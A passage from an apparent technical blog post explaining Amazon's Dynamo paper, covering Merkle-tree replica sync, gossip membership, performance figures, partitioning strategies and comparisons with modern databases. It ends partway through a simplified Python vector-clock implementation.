&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Felpfz43eb8y2waok30py.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Felpfz43eb8y2waok30py.png" alt="image" width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How Two Nodes Sync Using Merkle Trees
&lt;/h3&gt;

&lt;p&gt;When Node A and Node B want to check if they're in sync:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1&lt;/strong&gt;: Compare root hashes. If they're the same, everything is identical. Done! (No network traffic for the data itself.)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2&lt;/strong&gt;: If roots differ, compare their left children. Same? Skip that entire half of the key space.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3&lt;/strong&gt;: Keep descending only into subtrees where hashes differ, until you reach the leaf nodes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4&lt;/strong&gt;: Sync only the specific keys in the differing leaf nodes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Example: Comparing two nodes

Node A root: abc789  ← differs from Node B!
Node B root: abc788

Compare left subtrees:
  Node A left:  xyz123
  Node B left:  xyz123  ← same! Skip entire left half.

Compare right subtrees:
  Node A right: def456
  Node B right: def457  ← differs! Go deeper.

Compare right-left subtree:
  Node A right-left: ghi111
  Node B right-left: ghi111  ← same! Skip.

Compare right-right subtree:
  Node A right-right: jkl222
  Node B right-right: jkl333  ← differs! These are leaves.

→ Sync only the keys in the right-right leaf range (e.g., k10, k11, k12)
  Instead of comparing all 1 million keys, we compared 6 hashes
  and synced only 3 keys!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Synchronization process in code&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;sync_replicas&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key_range&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Efficiently sync two nodes using Merkle trees.
    Instead of comparing all keys, we compare hashes top-down.
    Only the ranges where hashes differ need actual key-level sync.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="n"&gt;tree_a&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node_a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_merkle_tree&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_range&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;tree_b&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node_b&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_merkle_tree&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key_range&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Step 1: Compare root hashes first.
&lt;/span&gt;    &lt;span class="c1"&gt;# If they match, every key in this range is identical — nothing to do!
&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;tree_a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;root_hash&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;tree_b&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;root_hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;  &lt;span class="c1"&gt;# Zero data transferred — full match!
&lt;/span&gt;
    &lt;span class="c1"&gt;# Step 2: Recursively find differences by traversing top-down.
&lt;/span&gt;    &lt;span class="c1"&gt;# Only descend into subtrees where hashes differ.
&lt;/span&gt;    &lt;span class="n"&gt;differences&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
    &lt;span class="n"&gt;stack&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[(&lt;/span&gt;&lt;span class="n"&gt;tree_a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;root&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tree_b&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;root&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="n"&gt;stack&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_b_subtree&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;stack&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;pop&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;hash&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;node_b_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;continue&lt;/span&gt;  &lt;span class="c1"&gt;# This whole subtree matches — skip it!
&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_leaf&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="c1"&gt;# Found a differing leaf — these keys need syncing
&lt;/span&gt;            &lt;span class="n"&gt;differences&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;extend&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;keys&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="c1"&gt;# Not a leaf yet — recurse into children
&lt;/span&gt;            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;child_a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;child_b&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;zip&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_a_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;children&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_b_subtree&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;children&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="n"&gt;stack&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;child_a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;child_b&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# Step 3: Sync only the specific keys that differed at leaf level.
&lt;/span&gt;    &lt;span class="c1"&gt;# This might be a handful of keys, not millions.
&lt;/span&gt;    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;differences&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;sync_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Why This Is Efficient
&lt;/h3&gt;

&lt;p&gt;The power of Merkle trees is that the number of hash comparisons you need scales with the &lt;em&gt;depth of the tree&lt;/em&gt; (logarithmic in the number of keys), not the number of keys themselves.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Node with 1,000,000 keys:

Naive approach:  Compare 1,000,000 keys individually
                 Cost: 1,000,000 comparisons

Merkle tree:     Compare O(log N) hashes top-down
                 Tree depth ≈ 20 levels
                 Cost: 20 comparisons to find differences
                 Then sync only the differing leaves (~few keys)

Speedup: ~50,000x fewer comparisons!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And critically, if two nodes are &lt;strong&gt;mostly in sync&lt;/strong&gt; (which is almost always true in a healthy cluster), the root hashes often match entirely and zero data needs to be transferred. The anti-entropy process is very cheap in the common case.&lt;/p&gt;

&lt;h2&gt;
  
  
  Membership and Failure Detection
&lt;/h2&gt;

&lt;p&gt;Dynamo uses a gossip protocol for membership management. Each node periodically exchanges membership information with random peers. There is no master node—all coordination is fully decentralized.&lt;/p&gt;

&lt;h3&gt;
  
  
  Gossip-Based Membership
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24s3u9bwupqxo96z5l4c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24s3u9bwupqxo96z5l4c.png" alt="image" width="800" height="804"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Design Points
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;No single coordinator&lt;/strong&gt;: Every node maintains its own view of cluster membership. There's no central registry, so there's no single point of failure for membership data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Failure suspicion vs. detection&lt;/strong&gt;: Dynamo uses an accrual-based failure detector (similar to Phi Accrual). Rather than a binary "alive/dead" judgment, nodes maintain a &lt;em&gt;suspicion level&lt;/em&gt; that rises the longer a peer is unresponsive. This avoids false positives from transient network hiccups.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Node A's view of Node B:
- Last heartbeat: 3 seconds ago → Suspicion low → Healthy
- Last heartbeat: 15 seconds ago → Suspicion rising → Likely slow/degraded
- Last heartbeat: 60 seconds ago → Suspicion high → Treat as failed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Decentralized bootstrapping&lt;/strong&gt;: New nodes contact a seed node to join, then gossip spreads their presence to the rest of the cluster. Ring membership is eventually consistent—different nodes may have slightly different views of the ring momentarily, which is acceptable.&lt;/p&gt;

&lt;h2&gt;
  
  
  Performance Characteristics: Real Numbers
&lt;/h2&gt;

&lt;p&gt;The paper provides fascinating performance data. Let me break it down:&lt;/p&gt;

&lt;h3&gt;
  
  
  Latency Distribution
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Metric              | Average | 99.9th Percentile
--------------------|---------|------------------
Read latency        | ~10ms   | ~200ms
Write latency       | ~15ms   | ~200ms

Key insight: 99.9th percentile is ~20x the average!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why the huge gap?&lt;/strong&gt; The 99.9th percentile is affected by:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Garbage collection pauses&lt;/li&gt;
&lt;li&gt;Disk I/O variations&lt;/li&gt;
&lt;li&gt;Network jitter&lt;/li&gt;
&lt;li&gt;Load imbalance&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is why Amazon SLAs are specified at 99.9th percentile, not average.&lt;/p&gt;

&lt;h3&gt;
  
  
  Version Conflicts
&lt;/h3&gt;

&lt;p&gt;From 24 hours of Amazon's production shopping cart traffic (per the Dynamo paper). Note these reflect Amazon's specific workload characteristics, not a universal baseline:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;99.94%    - Saw exactly one version (no conflict)
0.00057%  - Saw 2 versions
0.00047%  - Saw 3 versions  
0.00009%  - Saw 4 versions
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Takeaway&lt;/strong&gt;: Conflicts are rare in practice! Most often caused by concurrent writers (robots), not failures.&lt;/p&gt;

&lt;h2&gt;
  
  
  Partitioning Strategy Evolution
&lt;/h2&gt;

&lt;p&gt;Dynamo evolved through three partitioning strategies. This evolution teaches us important lessons:&lt;/p&gt;

&lt;h3&gt;
  
  
  Strategy 1: Random Tokens (Initial)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Problem: Random token assignment → uneven load
Problem: Adding nodes → expensive data scans
Problem: Can't easily snapshot the system
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Operational lesson&lt;/strong&gt;: Random token assignment sounds elegant but is a nightmare in practice. Each node gets a random position on the ring, which means wildly different data ownership ranges and uneven load distribution.&lt;/p&gt;

&lt;h3&gt;
  
  
  Strategy 2: Equal-sized Partitions + Random Tokens
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Improvement: Decouples partitioning from placement
Problem: Still has load balancing issues
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Strategy 3: Q/S Tokens Per Node — Equal-sized Partitions + Deterministic Placement (Current)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What Q and S mean:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Q&lt;/strong&gt; = the total number of fixed partitions the ring is divided into (e.g. 1024). Think of these as equally-sized, pre-cut slices of the hash space that never change shape.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;S&lt;/strong&gt; = the number of physical servers currently in the cluster (e.g. 8).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Q/S&lt;/strong&gt; = how many of those fixed slices each server is responsible for (e.g. 1024 / 8 = &lt;strong&gt;128 partitions per server&lt;/strong&gt;).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The key shift from earlier strategies: the ring is now divided into Q fixed, equal-sized partitions &lt;em&gt;first&lt;/em&gt;, and then those partitions are assigned evenly to servers. Servers no longer get random positions — they each own exactly Q/S partitions, distributed evenly around the ring.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Example: Q=12 partitions, S=3 servers

Ring divided into 12 equal slices (each covers 30° of the 360° ring):
  Partition  1:   0°– 30°  → Server A
  Partition  2:  30°– 60°  → Server B
  Partition  3:  60°– 90°  → Server C
  Partition  4:  90°–120°  → Server A
  Partition  5: 120°–150°  → Server B
  Partition  6: 150°–180°  → Server C
  ...and so on, round-robin

Each server owns exactly Q/S = 12/3 = 4 partitions → perfectly balanced.

When a 4th server joins (S becomes 4):
  New Q/S = 12/4 = 3 partitions per server.
  Each existing server hands off 1 partition to the new server.
  Only 3 out of 12 partitions move — the rest are untouched.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Benefits:
✓ Perfectly even load distribution (every server owns the same number of partitions)
✓ Fast bootstrapping — a joining node receives whole partition files, not scattered key ranges
✓ Easy archival — each partition is a self-contained file that can be snapshotted independently
✓ Membership metadata shrinks from multiple MB (hundreds of random tokens) to a few KB (a simple partition-to-server table)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This evolution — from random tokens to fixed, equal-sized partitions with balanced ownership — is one of the most instructive operational learnings from Dynamo. The early approach prioritized simplicity of implementation; the later approach prioritized operational simplicity and predictability.&lt;/p&gt;

&lt;h2&gt;
  
  
  Comparing Dynamo to Modern Systems
&lt;/h2&gt;

&lt;p&gt;Let's see how Dynamo concepts appear in systems you might use today:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;System&lt;/th&gt;
&lt;th&gt;Consistency Model&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;th&gt;Dynamo Influence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cassandra&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tunable (N, R, W)&lt;/td&gt;
&lt;td&gt;Time-series, analytics&lt;/td&gt;
&lt;td&gt;Direct descendant — heavily inspired by Dynamo, uses same consistent hashing and quorum concepts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Riak&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tunable, vector clocks&lt;/td&gt;
&lt;td&gt;Key-value store&lt;/td&gt;
&lt;td&gt;Closest faithful Dynamo implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Amazon DynamoDB&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Eventually consistent by default&lt;/td&gt;
&lt;td&gt;Managed NoSQL&lt;/td&gt;
&lt;td&gt;
&lt;strong&gt;⚠️ Not the same as Dynamo!&lt;/strong&gt; DynamoDB is a completely different system internally, with no vector clocks and much simpler conflict resolution. Shares the name and high-level inspiration only.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Voldemort&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tunable&lt;/td&gt;
&lt;td&gt;LinkedIn's data store&lt;/td&gt;
&lt;td&gt;Open-source Dynamo implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Google Spanner&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Linearizable&lt;/td&gt;
&lt;td&gt;Global SQL&lt;/td&gt;
&lt;td&gt;Opposite choice to Dynamo — prioritizes CP via TrueTime clock synchronization&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Redis Cluster&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Eventually consistent&lt;/td&gt;
&lt;td&gt;Caching, sessions&lt;/td&gt;
&lt;td&gt;Uses consistent hashing; much simpler conflict resolution&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;The DynamoDB confusion&lt;/strong&gt;: Many engineers conflate Amazon DynamoDB with the Dynamo paper. They are very different. DynamoDB is a managed service optimized for operational simplicity. It does not expose vector clocks, does not use the same partitioning scheme, and uses a proprietary consistency model. The paper is about the internal Dynamo storage engine that predates DynamoDB.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  What Dynamo Does NOT Give You
&lt;/h2&gt;

&lt;p&gt;Every senior engineer blog should be honest about limitations. Here's what Dynamo explicitly trades away:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No transactions&lt;/strong&gt;: Operations are single-key only. You can't atomically update multiple keys.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No secondary indexes&lt;/strong&gt;: You can only look up data by its primary key (at least in the original design).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No joins&lt;/strong&gt;: It's a key-value store. There is no query language.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No global ordering&lt;/strong&gt;: Events across different keys have no guaranteed ordering.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No linearizability&lt;/strong&gt;: Even at R=W=N, Dynamo does not provide linearizable reads. There is no global clock, no strict serializability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No automatic conflict resolution&lt;/strong&gt;: The system detects conflicts and surfaces them to the application. The &lt;em&gt;application&lt;/em&gt; must resolve them. If your engineers don't understand this, you will have subtle data bugs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Repair costs at scale&lt;/strong&gt;: The anti-entropy process (Merkle tree reconciliation) is not free. At large scale, background repair traffic can be significant.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vector clock growth&lt;/strong&gt;: In high-churn write environments with many coordinators, vector clocks can grow large enough to require truncation, which introduces potential causality loss.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Understanding these limitations is critical to successfully operating Dynamo-style systems in production.&lt;/p&gt;

&lt;h2&gt;
  
  
  Practical Implementation Example
&lt;/h2&gt;

&lt;p&gt;Below is a self-contained Python implementation of the core Dynamo concepts. It's intentionally simplified—no actual networking, no persistence—but it faithfully models how vector clocks, the consistent hash ring, quorum reads/writes, and conflict detection interact. Each component is explained before its code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Part 1: Vector Clock
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;VectorClock&lt;/code&gt; class is the foundation of version tracking. It's just a dictionary mapping &lt;code&gt;node_id → counter&lt;/code&gt;. Two key operations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;increment(node)&lt;/code&gt; — bump our own counter when we write&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;dominates(other)&lt;/code&gt; — check if one clock is causally "after" another; if neither dominates, the writes were concurrent (conflict)
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;__future__&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;annotations&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;dataclasses&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;dataclass&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;typing&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Optional&lt;/span&gt;


&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Tracks causality across distributed writes.

    A clock like {&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;nodeA&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;: 2, &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;nodeB&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;: 1} means:
      - nodeA has coordinated 2 writes
      - nodeB has coordinated 1 write
      - Any version with these counters has &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;seen&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; those writes
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;copy&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;clock&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;increment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Return a new clock with node_id&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s counter bumped by 1.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;new_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;copy&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
